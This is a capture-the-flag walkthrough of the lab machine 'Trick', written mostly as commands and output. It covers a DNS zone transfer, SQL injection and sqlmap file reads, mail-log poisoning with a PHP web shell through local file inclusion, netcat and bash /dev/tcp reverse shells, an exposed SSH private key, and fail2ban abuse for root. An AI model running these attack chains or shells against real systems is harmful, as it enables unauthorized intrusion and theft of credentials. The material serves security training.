Trick

External Enumeration

Nmap

nmap -sC -sV -T4 10.129.227.180

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -A -sU --top-port 100 10.129.227.180

53/udp   open          domain   ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
68/udp   open|filtered dhcpc
177/udp  open|filtered xdmcp
631/udp  open|filtered ipp
5353/udp open|filtered zeroconf

SSH (22)

Attempting Anonymous Login - No Results

ssh anonymous@10.129.227.180

HTTP (80)

  • Basic website, Not setup
  • Checking for VHosts, and Directories

Vhost Enumeration - No Results

ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.227.180 -H 'Host: FUZZ.10.129.227.180' -fs 5480

Directory Enumeration - No Results

ffuf -u http://10.129.227.180/FUZZ -w /opt/useful/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fc 403,404

css                  [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 32ms]
js                   [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 33ms]
assets               [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 32ms]

DNS

dig axfr @10.129.227.180 trick.htb

; <<>> DiG 9.18.41-1~deb12u1-Debian <<>> axfr @10.129.227.180 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 26 msec
;; SERVER: 10.129.227.180#53(10.129.227.180) (TCP)
;; WHEN: Sat Jan 10 15:26:37 EST 2026
;; XFR size: 6 records (messages 1, bytes 231)
  • Shows subdomain of preprod-payroll.trick.htb
  • add preprod-payroll.trick.htb to /etc/hosts
  • Visiting preprod-payroll.trick.htb displays an employee payroll website with a username and password field
  • Trying basic SQL Injection on website, admin' 1=1-- - allows us entry
  • Find Username Enemigosss
  • Find Employee John C. Smith in the IT Department

SQL Map

  • Capturing Login Request via burp
  • Right-click and save as file login.req 
sqlmap -r login.req –level=5 –risk=3 –threads=10 –random-agent -technique=BEU


Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=admin' OR NOT 7452=7452-- lljn&password=admin

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=admin' OR (SELECT 9363 FROM(SELECT COUNT(*),CONCAT(0x716b787071,(SELECT (ELT(9363=9363,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- yPAC&password=admin

sqlmap -r login.req -batch -dump

Database: payroll_db
Table: users
[1 entry]

Name            Password                Username
Administrator | SuperGucciRainbowCake | Enemigoss
  • Find password for Enemigoss User
sqlmap -r login.req -privilges

database management system users privileges:
[*] 'remo'@'localhost' [1]:
    privilege: FILE
  • Find Username remo
  • With FILE privilege we can start enumerating server
  • Important Files include /etc/passwd and the nginx config /etc/nginx/sites-enabled/default 
sqlmap -r login.req --file-read=/etc/passwd

cat /home/parrot/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd

michael:x:1001:1001::/home/michael:/bin/bash
  • Find User Michael exists on the machine

sqlmap -r login.req --file-read=/etc/nginx/sites-enabled/default

cat /home/parrot/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_nginx_sites-enabled_default

server_name preprod-marketing.trick.htb;
  • Find Vhost preprod-marketing.trick.htb
  • add to /etc/hosts

Enumerating preprod-marketing.trick.htb

  • Able to find LFI Vulnerability

SMTP (25)

  • Try to send Michael an email with PHP code. It will appear in /var/mail/michael
nc trick.htb 25
mail from: tyler
rcpt to: michael
data
<?php system($_GET['cmd']);?>
.
  • Run NC from webserver
/var/mail/michael&cmd=

nc 10.10.14.128 5555 -e /bin/sh
http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//var/mail/michael&cmd=nc%2010.10.14.128%205555%20-e%20/bin/sh
  • Receiving shell as Michael

Enumerating Michael

cd /home/michael
michael@trick:~$ cat user.txt
7dc0886218e1e198a8410d6585403113
  • Finding SSH key for Michael
cat << 'EOF' > id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
EOF
chmod 600 id_rsa
ssh michael@10.129.59.222 -i id_rsa

Checking Permissions for Michael

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart
michael@trick:~$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

Privilege Escalation

cat /etc/init.d/fail2ban
  • Goal, Edit Fail2Ban script so when a user is supposed to be banned we receive an elevated shell
  • Checking Fail2Ban, It is run from iptables-multiport.conf , update the actionban function
  • We do not have write access over the file, but since it is located in the securities group we are able to move files
mv iptables-multiport.conf .config
cp .config iptables-multiport.conf
ls -la

-rw-r--r-- 1 michael michael   1420 Jan 12 01:22 iptables-multiport.conf
#Now we have ownership of the file
  • update iptables-multiport.conf 
actionban = /tmp/shell.sh
  • Create shell.sh in /tmp 
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.14.128/4444 0>&1' > /tmp/shell.sh
  • Restart Fail2Ban service to save changes
  • Start Listener
nc nvlp 4444
  • Get Michael banned by logging in with incorrect credentials
ssh michael@trick.htb
cd root
cat root.txt
eb02daa527b94e5e7e6459640c924211